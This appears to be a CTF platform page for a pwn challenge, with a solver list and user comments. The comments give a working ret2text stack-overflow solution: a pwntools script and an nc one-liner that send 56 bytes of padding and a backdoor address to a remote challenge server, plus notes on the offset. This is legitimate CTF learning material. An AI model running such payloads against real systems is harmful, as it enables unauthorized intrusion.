评分(1)
解题动态
xtk 攻破了该题 3小时前
不为 攻破了该题 6小时前
等往事风中吹‘ 攻破了该题 12小时前
kkkkkkkkkkk 攻破了该题 1天前
谢勇强大王 攻破了该题 3天前
pwn00 攻破了该题 4天前
whhphd 攻破了该题 4天前
错了南北 攻破了该题 5天前
ctfdshen 攻破了该题 6天前
19902457330 攻破了该题 6天前
新手大王 攻破了该题 8天前
0xForg3r 攻破了该题 8天前
Despa1r 攻破了该题 8天前
亦梦 攻破了该题 9天前
Autu 攻破了该题 10天前
香克斯呀 攻破了该题 10天前
川渝流水 攻破了该题 10天前
你好999你好 攻破了该题 13天前
lizzzzp 攻破了该题 13天前
评论
xtk 3小时前
举报
from pwn import * io=remote("171.80.2.169",17626) payload=b'a'*(0x30+8)+p64(0x400751) io.recvline("say something?\n") io.sendline(payload) io.interactive()栈溢出覆盖返回地址到后门函数就好了
modeng 1月前
举报
这是我的思路,希望能帮到你解题 https://blog.csdn.net/m_de_g/article/details/155747760?spm=1001.2014.3001.5502
王安小子 1月前
举报
python3 -c 'print("A"*56 + "\x51\x07\x40\x00\x00\x00\x00\x00")' | nc 171.80.2.169 15170 就ok
乌鸦乌鸦乌鸦乌鸦 6月前
举报
为什么答案是56字节,我测出来是40字节
scust 5月前
举报
看到main中char s[48]; // [rsp+0h] [rbp-30h] BYREF没?padding = 0x30+8 #epb占用8个字节
weiyouzhunze 8月前
举报
栈溢出漏洞利用
afag 9月前
举报
0x30+8填充
17773146280 9月前
举报
简单的ret2text题目,后门函数地址加上缓冲区长度就可以了
YellowZy 1年前
举报
应该是从stack of main里面看到s到r的距离还有8字节的偏移,所以应该是48+8=56字节填充
255a 1年前
举报
修改main函数返回地址的rcx的值
da111sy 1年前
举报
https://zaoganmaqule.github.io/2024/08/21/bugku-ctf%E7%9A%84pwn%E9%A2%98%E8%A7%A3/#more
puppet 1年前
举报
能看见这么多题解真好